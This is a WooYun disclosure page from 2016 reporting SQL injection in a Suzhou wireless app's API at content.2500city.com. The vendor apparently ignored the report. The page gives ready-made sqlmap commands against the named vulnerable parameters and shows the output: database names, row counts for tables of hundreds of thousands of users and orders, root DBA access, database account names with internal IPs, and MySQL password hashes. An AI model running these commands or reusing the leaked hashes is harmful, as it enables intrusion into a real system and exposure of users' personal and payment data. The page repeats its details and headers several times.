苏州无线多处SQL注入垮裤查询与sztv同库涉及(百万用户信息+订单信息+论坛用户)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0208092

漏洞标题：苏州无线多处SQL注入垮裤查询与sztv同库涉及(百万用户信息+订单信息+论坛用户)

漏洞作者：黑色键盘丶

提交时间：2016-05-13 12:16

修复时间：2016-05-18 12:20

公开时间：2016-05-18 12:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-05-13：细节已通知厂商并且等待厂商处理中
2016-05-18：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

sqlmap语法:sqlmap.py -u "http://content.2500city.com/Json?relatedOrder=7&platform
=2&deviceId=864690023834800&method=SaveComent&appVersion=3.9.2&userId=1678074&ve
rsion=3.9.2&comment=%F0%9F%98%811&type=1&uname=rknsja&relateId=470258" -p "relatedOrder" --dbs
---------------------------------------------------------------------------------
sqlmap语法:sqlmap.py -u "http://content.2500city.com/Json?platform=2&deviceId=864
690023834800&method=SaveComent&appVersion=3.9.2&userId=1678074&version=3.9.2&com
ment=111&type=1&uname=rknsja&relateId=470214" -p "relateId" --dbs

数据库信息

available databases [21]:
[*] bike
[*] information_schema
[*] mysql
[*] news_stat
[*] palau_core
[*] statistic
[*] sztv
[*] sztv_baoliaodb
[*] sztv_busdb
[*] sztv_coachdb
[*] sztv_mcenterdb
[*] sztv_newsdb
[*] sztv_paydb
[*] sztv_statdb
[*] sztv_subwaydb
[*] sztv_systemdb
[*] sztv_taxidb
[*] sztv_ucenterdb
[*] sztv_urecorddb
[*] sztv_weatherdb
[*] sztv_webdb

dba权限垮裤查询
83w用户信息+57w订单
Database: sztv_ucenterdb
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| `user`             | 830469  |
| order_info         | 574954  |
| credit_log         | 395133  |
| user_currency      | 364474  |
| currency_log       | 364351  |
| credit             | 257099  |
| login_log          | 197593  |
| sms_user           | 46552   |
| account_log        | 19755   |
| user_account       | 19700   |
| mobile             | 6849    |
| smsverify_log      | 2463    |
| refundorder        | 927     |
| invitelog          | 584     |
| event_2016050401_1 | 223     |
| blacklist          | 176     |
| credit_rule        | 7       |
| product_notice     | 7       |
| user_addr          | 2       |
| smsverify          | 1       |
+--------------------+---------+

Database: sztv_paydb
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| action_order  | 29872   |
| action_draw   | 1901    |
| action_draw_1 | 1457    |
| `action`      | 14      |
+---------------+---------+
Database: palau_core
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| user_passport | 788284  |
| user_profile  | 787466  |
| user_secret   | 787465  |
| application   | 6       |
| client        | 2       |
| client_app    | 2       |
+---------------+---------+
Database: sztv_coachdb
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| `order`            | 434727  |
| `user`             | 138878  |
| email              | 6674    |
| stat_email_deliver | 2661    |
| t                  | 21      |
+--------------------+---------+
Database: bike
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| pm25                | 53629405 |
| bike_statistics     | 11931902 |
| vote_record         | 2266953 |
| booklog             | 275523  |
| car_price           | 82911   |
| linestationinfo     | 28996   |
| survey_addedoption  | 20785   |
| busstationinfo      | 20199   |
| bike_badwords       | 20142   |
| bike_busstation     | 19743   |
| survey_action       | 19478   |
| survey_answers      | 16275   |
| busstation          | 8371    |
| xunbao_user         | 3788    |
| bike_station_copy   | 2552    |
| ct_log              | 2389    |
| skin_icon           | 1232    |
| bike_station        | 1163    |
| linestation         | 905     |
| vote_info           | 789     |
| survey_option       | 621     |
| bike_splashimg      | 597     |
| bookiphone          | 308     |
| gravity             | 205     |
| survey_title        | 162     |
| bike_linestation    | 129     |
| ct_option           | 128     |
| bike_trainstation   | 125     |
| temp_apply          | 115     |
| bike_mood           | 102     |
| vote_candidate      | 102     |
| skin_background     | 80      |
| xunbao_temp         | 51      |
| ct_page             | 47      |
| ct_title            | 46      |
| temp_apply1         | 46      |
| bookandroid         | 40      |
| survey_page         | 30      |
| survey_candidate    | 24      |
| vote_information    | 20      |
| temp_apply2         | 18      |
| book                | 15      |
| bike_city           | 13      |
| apps_recommend_copy | 12      |
| temp_dhsz12         | 12      |
| bike_stationnews    | 11      |
| apps_recommend      | 10      |
| survey_voteinfo     | 9       |
| taxi_landmark       | 9       |
| bookImg             | 8       |
| bike_line           | 4       |
| skin_program        | 4       |
| survey_vote         | 4       |
| survey_awardtimes   | 3       |
| sztv_ad             | 2       |
| bike_admin          | 1       |
+---------------------+---------+

[02:37:40] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0
[02:37:40] [INFO] testing if current user is DBA
[02:37:40] [INFO] fetching current user
[02:37:40] [INFO] resumed: root@%
current user is DBA:    True
[02:37:40] [INFO] fetching database users
[02:37:40] [INFO] the SQL query used returns 282 ent
database management system users [22]:
[*] 'backup'@'192.168.50.50'
[*] 'bakdb'@'%'
[*] 'bakdb'@'192.168.50.89'
[*] 'bakup'@'192.168.50.89'
[*] 'chaxun'@'%'
[*] 'cloud'@'%'
[*] 'dbbak'@'192.168.50.89'
[*] 'dbbak'@'localhost'
[*] 'debian-sys-maint'@'localhost'
[*] 'jeecn'@'localhost'
[*] 'jiankongbao'@'60.195.252.106'
[*] 'jiankongbao'@'60.195.252.107'
[*] 'reader'@'%'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'192.168.50.177'
[*] 'root'@'192.168.50.20'
[*] 'root'@'192.168.50.40'
[*] 'root'@'192.168.50.60'
[*] 'root'@'192.168.50.74'
[*] 'root'@'localhost'
[*] 'txq'@'%'
eb application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0
database management system users password hashes:
[*] backup [1]:
    password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
[*] bakdb [2]:
    password hash: *358FCE96A37CA6A8DDBAE3EBA3A61385F709C060
    password hash: *939C0EE8C109E2F942E2AE69B29016556BAF6819
[*] bakup [1]:
    password hash: *A116AE5F665BF5F27292C069082E763E023D597B
[*] chaxun [1]:
    password hash: *358FCE96A37CA6A8DDBAE3EBA3A61385F709C060
[*] cloud [1]:
    password hash: *358FCE96A37CA6A8DDBAE3EBA3A61385F709C060
[*] dbbak [2]:
    password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
    password hash: *F42C6D37F7F070D029EDED0C444C833B66147779
[*] debian-sys-maint [1]:
    password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
[*] jeecn [1]:
    password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
[*] jiankongbao [2]:
    password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
    password hash: *FC69E042CE30D92E2952335F690CF2345C812E36
[*] reader [1]:
    password hash: *ADAFC02D5BD8CD1DC3BD2D4EC546BE906B907471
[*] root [3]:
    password hash: *09B8E1925D91B246C24321C967D2181F8CF86D82
    password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
    password hash: *3ACC54E8541A9AE6E1381A5320E5244D3C01F474
[*] txq [1]:
    password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC

这里一个支付的不知道是不是

抓包

修改为0.1

漏洞证明：

sqlmap语法:sqlmap.py -u "http://content.2500city.com/Json?relatedOrder=7&platform
=2&deviceId=864690023834800&method=SaveComent&appVersion=3.9.2&userId=1678074&ve
rsion=3.9.2&comment=%F0%9F%98%811&type=1&uname=rknsja&relateId=470258" -p "relatedOrder" --dbs
---------------------------------------------------------------------------------
sqlmap语法:sqlmap.py -u "http://content.2500city.com/Json?platform=2&deviceId=864
690023834800&method=SaveComent&appVersion=3.9.2&userId=1678074&version=3.9.2&com
ment=111&type=1&uname=rknsja&relateId=470214" -p "relateId" --dbs

数据库信息

available databases [21]:
[*] bike
[*] information_schema
[*] mysql
[*] news_stat
[*] palau_core
[*] statistic
[*] sztv
[*] sztv_baoliaodb
[*] sztv_busdb
[*] sztv_coachdb
[*] sztv_mcenterdb
[*] sztv_newsdb
[*] sztv_paydb
[*] sztv_statdb
[*] sztv_subwaydb
[*] sztv_systemdb
[*] sztv_taxidb
[*] sztv_ucenterdb
[*] sztv_urecorddb
[*] sztv_weatherdb
[*] sztv_webdb

dba权限垮裤查询
83w用户信息+57w订单
Database: sztv_ucenterdb
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| `user`             | 830469  |
| order_info         | 574954  |
| credit_log         | 395133  |
| user_currency      | 364474  |
| currency_log       | 364351  |
| credit             | 257099  |
| login_log          | 197593  |
| sms_user           | 46552   |
| account_log        | 19755   |
| user_account       | 19700   |
| mobile             | 6849    |
| smsverify_log      | 2463    |
| refundorder        | 927     |
| invitelog          | 584     |
| event_2016050401_1 | 223     |
| blacklist          | 176     |
| credit_rule        | 7       |
| product_notice     | 7       |
| user_addr          | 2       |
| smsverify          | 1       |
+--------------------+---------+

Database: sztv_paydb
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| action_order  | 29872   |
| action_draw   | 1901    |
| action_draw_1 | 1457    |
| `action`      | 14      |
+---------------+---------+
Database: palau_core
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| user_passport | 788284  |
| user_profile  | 787466  |
| user_secret   | 787465  |
| application   | 6       |
| client        | 2       |
| client_app    | 2       |
+---------------+---------+
Database: sztv_coachdb
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| `order`            | 434727  |
| `user`             | 138878  |
| email              | 6674    |
| stat_email_deliver | 2661    |
| t                  | 21      |
+--------------------+---------+
Database: bike
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| pm25                | 53629405 |
| bike_statistics     | 11931902 |
| vote_record         | 2266953 |
| booklog             | 275523  |
| car_price           | 82911   |
| linestationinfo     | 28996   |
| survey_addedoption  | 20785   |
| busstationinfo      | 20199   |
| bike_badwords       | 20142   |
| bike_busstation     | 19743   |
| survey_action       | 19478   |
| survey_answers      | 16275   |
| busstation          | 8371    |
| xunbao_user         | 3788    |
| bike_station_copy   | 2552    |
| ct_log              | 2389    |
| skin_icon           | 1232    |
| bike_station        | 1163    |
| linestation         | 905     |
| vote_info           | 789     |
| survey_option       | 621     |
| bike_splashimg      | 597     |
| bookiphone          | 308     |
| gravity             | 205     |
| survey_title        | 162     |
| bike_linestation    | 129     |
| ct_option           | 128     |
| bike_trainstation   | 125     |
| temp_apply          | 115     |
| bike_mood           | 102     |
| vote_candidate      | 102     |
| skin_background     | 80      |
| xunbao_temp         | 51      |
| ct_page             | 47      |
| ct_title            | 46      |
| temp_apply1         | 46      |
| bookandroid         | 40      |
| survey_page         | 30      |
| survey_candidate    | 24      |
| vote_information    | 20      |
| temp_apply2         | 18      |
| book                | 15      |
| bike_city           | 13      |
| apps_recommend_copy | 12      |
| temp_dhsz12         | 12      |
| bike_stationnews    | 11      |
| apps_recommend      | 10      |
| survey_voteinfo     | 9       |
| taxi_landmark       | 9       |
| bookImg             | 8       |
| bike_line           | 4       |
| skin_program        | 4       |
| survey_vote         | 4       |
| survey_awardtimes   | 3       |
| sztv_ad             | 2       |
| bike_admin          | 1       |
+---------------------+---------+

[02:37:40] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0
[02:37:40] [INFO] testing if current user is DBA
[02:37:40] [INFO] fetching current user
[02:37:40] [INFO] resumed: root@%
current user is DBA:    True
[02:37:40] [INFO] fetching database users
[02:37:40] [INFO] the SQL query used returns 282 ent
database management system users [22]:
[*] 'backup'@'192.168.50.50'
[*] 'bakdb'@'%'
[*] 'bakdb'@'192.168.50.89'
[*] 'bakup'@'192.168.50.89'
[*] 'chaxun'@'%'
[*] 'cloud'@'%'
[*] 'dbbak'@'192.168.50.89'
[*] 'dbbak'@'localhost'
[*] 'debian-sys-maint'@'localhost'
[*] 'jeecn'@'localhost'
[*] 'jiankongbao'@'60.195.252.106'
[*] 'jiankongbao'@'60.195.252.107'
[*] 'reader'@'%'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'192.168.50.177'
[*] 'root'@'192.168.50.20'
[*] 'root'@'192.168.50.40'
[*] 'root'@'192.168.50.60'
[*] 'root'@'192.168.50.74'
[*] 'root'@'localhost'
[*] 'txq'@'%'
eb application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0
database management system users password hashes:
[*] backup [1]:
    password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
[*] bakdb [2]:
    password hash: *358FCE96A37CA6A8DDBAE3EBA3A61385F709C060
    password hash: *939C0EE8C109E2F942E2AE69B29016556BAF6819
[*] bakup [1]:
    password hash: *A116AE5F665BF5F27292C069082E763E023D597B
[*] chaxun [1]:
    password hash: *358FCE96A37CA6A8DDBAE3EBA3A61385F709C060
[*] cloud [1]:
    password hash: *358FCE96A37CA6A8DDBAE3EBA3A61385F709C060
[*] dbbak [2]:
    password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
    password hash: *F42C6D37F7F070D029EDED0C444C833B66147779
[*] debian-sys-maint [1]:
    password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
[*] jeecn [1]:
    password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
[*] jiankongbao [2]:
    password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
    password hash: *FC69E042CE30D92E2952335F690CF2345C812E36
[*] reader [1]:
    password hash: *ADAFC02D5BD8CD1DC3BD2D4EC546BE906B907471
[*] root [3]:
    password hash: *09B8E1925D91B246C24321C967D2181F8CF86D82
    password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
    password hash: *3ACC54E8541A9AE6E1381A5320E5244D3C01F474
[*] txq [1]:
    password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC

这里一个支付的不知道是不是

抓包

修改为0.1

修复方案：

过滤

版权声明：转载请注明来源黑色键盘丶@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-05-18 12:20

厂商回复：

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0208092

漏洞标题：苏州无线多处SQL注入垮裤查询与sztv同库涉及(百万用户信息+订单信息+论坛用户)

相关厂商：苏州世纪飞越网络信息有限公司

漏洞作者：黑色键盘丶

提交时间：2016-05-13 12:16

修复时间：2016-05-18 12:20

公开时间：2016-05-18 12:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源黑色键盘丶@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0208092

漏洞标题：苏州无线多处SQL注入垮裤查询与sztv同库涉及(百万用户信息+订单信息+论坛用户)

相关厂商：苏州世纪飞越网络信息有限公司

漏洞作者： 黑色键盘丶

提交时间：2016-05-13 12:16

修复时间：2016-05-18 12:20

公开时间：2016-05-18 12:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0208092"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：黑色键盘丶

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源黑色键盘丶@乌云